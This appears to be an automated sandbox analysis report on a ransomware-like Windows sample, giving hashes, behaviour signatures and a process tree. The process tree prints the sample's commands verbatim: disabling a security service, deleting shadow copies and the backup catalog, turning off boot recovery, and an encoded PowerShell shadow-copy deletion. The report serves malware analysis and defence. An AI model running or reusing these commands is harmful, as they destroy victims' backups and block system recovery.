Analysis
-
max time kernel
114s -
max time network
119s -
platform
windows7_x64 -
resource
win7 -
submitted
21-07-2020 16:33
General
-
Target
svchost.bin.exe
-
Size
312KB
-
MD5
fbd82a5f5bfe23872fad17cf62c41a6e
-
SHA1
03dff661da8207517fc4cb3c0809e8c0fe7f76fa
-
SHA256
a1b6faa0465ec8bf30e3450f9679f121ff9e724257577c38c813b77e82e1f42f
-
SHA512
ac653d1f6b2222c56c3b73715219028a70ca078c87585a11ee2260d68d336e76a794d5d4c111c7c423aa916ed375d18a0cc3a6eb4789e40414243467e11da9bc
Score
10/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
-
Modifies service 2 TTPs 4 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Drops file in Drivers directory 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
-
System policy modification 1 TTPs 17 IoCs
-
UAC bypass 3 TTPs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes
-
C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Drops file in Drivers directory
- System policy modification
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc config "AppCheck" start=disabled2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc config "AppCheck" start=disabled3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/756-2-0x0000000000000000-mapping.dmp
-
memory/868-1-0x0000000000000000-mapping.dmp
-
memory/1060-4-0x0000000000000000-mapping.dmp
-
memory/1092-3-0x0000000000000000-mapping.dmp
-
memory/1512-0-0x0000000000000000-mapping.dmp
-
memory/1880-6-0x0000000000000000-mapping.dmp